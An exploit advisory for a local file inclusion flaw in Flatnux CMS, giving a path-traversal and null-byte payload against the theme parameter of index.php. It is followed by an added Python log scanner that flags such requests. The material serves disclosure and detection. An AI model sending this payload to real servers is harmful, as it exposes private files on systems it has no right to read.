
# Title : Flatnux CMS 2013-01.17 (index.php, theme param) - Local File Inclusion
# Published : 2013-03-22
# Author :


##########################################
[~] Exploit Title: Flatnux CMS Local File Inclusion
[~] Date: 21-03-2013
[~] Author: DaOne aka Mocking Bird
[~] Vendor Homepage: http://flatnux.altervista.org/
[~] Software Link: http://flatnux.altervista.org/download.html?f=Flatnux-Next/flatnux-2013-01.17.zip
[~] Category: webapps/php
[~] Version: 2013-01.17
[~] Tested on: Apache/2.2.8(Win32) PHP/5.2.6
##########################################

# Exploit
index.php?theme={localfile}{nullbyte}
http://localhost/flatnux/index.php?theme=../../../../../../../../../../windows/win.ini%00
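
# Detection (added example, not part of the original advisory or of Flatnux)
A log check for the request pattern above: it flags access-log lines where the `theme` parameter carries a null byte, a traversal sequence, or anything other than a plain name. The Apache log format, the allowed theme-name pattern, the theme name `default` and the sample lines are assumptions constructed for this example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumption: Apache common/combined log format; only the request line is parsed.
REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')
TRAVERSAL_RE = re.compile(r"\.\.[/\\]")
# Assumption: legitimate theme names are simple directory names.
THEME_NAME_RE = re.compile(r"[A-Za-z0-9_-]+")

def theme_findings(log_line):
    """Return the reasons the `theme` parameter in one log line looks like file inclusion."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return []
    reasons = []
    # parse_qsl percent-decodes values, so %00 arrives here as "\x00".
    for name, value in parse_qsl(urlsplit(match.group(1)).query, keep_blank_values=True):
        if name != "theme":
            continue
        if "\x00" in value:
            reasons.append("null byte")
        if TRAVERSAL_RE.search(value):
            reasons.append("path traversal")
        if not THEME_NAME_RE.fullmatch(value):
            reasons.append("not a plain theme name")
    return reasons

def scan(lines):
    """Return (line_number, reasons) for every line with at least one finding."""
    hits = []
    for number, line in enumerate(lines, start=1):
        reasons = theme_findings(line)
        if reasons:
            hits.append((number, reasons))
    return hits

# Constructed sample log lines (not taken from a real server).
SAMPLE_LOG = [
    '192.0.2.10 - - [21/Mar/2013:10:00:01 +0000] "GET /flatnux/index.php?theme=default HTTP/1.1" 200 5120',
    '192.0.2.66 - - [21/Mar/2013:10:00:07 +0000] "GET /flatnux/index.php?theme=../../../../windows/win.ini%00 HTTP/1.1" 200 477',
    '192.0.2.10 - - [21/Mar/2013:10:00:09 +0000] "GET /flatnux/index.php?page=news HTTP/1.1" 200 4096',
]

if __name__ == "__main__":
    for number, reasons in scan(SAMPLE_LOG):
        print(f"line {number}: {', '.join(reasons)}")
```

PHP 5.3.4 and later reject file paths containing a null byte, so the `%00` suffix only truncates the path on older builds such as the PHP/5.2.6 listed under "Tested on"; the traversal and plain-name checks do not depend on the PHP version.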